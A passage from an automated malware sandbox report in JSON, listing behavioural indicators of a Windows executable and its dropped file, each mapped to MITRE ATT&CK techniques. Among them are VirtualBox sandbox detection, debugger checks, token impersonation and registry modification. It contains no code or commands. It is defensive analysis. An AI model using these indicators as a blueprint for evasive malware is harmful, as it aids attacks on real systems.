8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"37B29193BC5271AB066CE6BBAF110CE08EC5BA81E2C167A11F109F75625BA2C5\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARSINGNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify sandbox environment running process\n Matched sigs: Able to identify virtual/sandbox environment\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-306", "type": 2, "relevance": 1, "name": "Contains ability to impersonate access tokens (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExW\" (Indicator: \"RegSetValue\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"RegFlushKey\" (Indicator: \"RegFlushKey\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"RegFlushKey\" (Indicator: \"RegFlushKey\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"RegSetValueExW\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"RegFlushKey\" (Indicator: \"RegFlushKey\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"RegSetValueExW\" (Indicator: \"RegSetValue\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"RegFlushKey\" (Indicator: \"RegFlushKey\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"RegSetValueExW\" (Indicator: \"RegSetValue\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"SetTimer\" (Indicator: \"SetTimer\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-320", "type": 2, "relevance": 1, "name": "Contains ability to pass information to a window procedure (API string)", "description": "Found reference to API \"CallWindowProcA\" (Indicator: \"CallWindowProc\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00006104)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"SetUnhandledExceptionFilter\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-162", "type": 2, "relevance": 1, "name": "Contains ability to retrieve volume information (API string)", "description": "Found reference to API \"GetVolumeInformationW\" (Indicator: \"GetVolumeInformation\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetVolumeInformationW\" (Indicator: \"GetVolumeInformation\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetVolumeInformationW\" (Indicator: \"GetVolumeInformation\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetVolumeInformationW\" (Indicator: \"GetVolumeInformation\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetWindowTextW\" (Indicator: \"GetWindowText\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-666", "type": 2, "relevance": 1, "name": "Able to identify sandbox environment running process", "description": "Found string \"vboxservice.exe\" (Indicator: \"vboxservice.exe\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n file/memory contains long string with (Indicator: \"vboxservice.exe\"; File: \"085cda53603755dc.exe\")\n Found string \"vboxservice.exe\" (Indicator: \"vboxservice.exe\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-660", "type": 2, "relevance": 1, "name": "Able to identify virtual/sandbox environment", "description": "Found string \"vboxguestadditions\" (Indicator: \"VBoxGuest\"; Source: \"00000000-00005304.00000000.173100.00620000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" queries volume information of \"C:\\\" at 00000000-00005304-0000010C-158347\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00006104-0000010C-303385\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1053733", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-89", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about the current system (API string)", "description": "Found reference to API \"ExpandEnvironmentStringsW\" (Indicator: \"ExpandEnvironmentStrings\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"ExpandEnvironmentStringsW\" (Indicator: \"ExpandEnvironmentStrings\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"ExpandEnvironmentStringsW\" (Indicator: \"ExpandEnvironmentStrings\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"ExpandEnvironmentStringsW\" (Indicator: \"ExpandEnvironmentStrings\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1055.015", 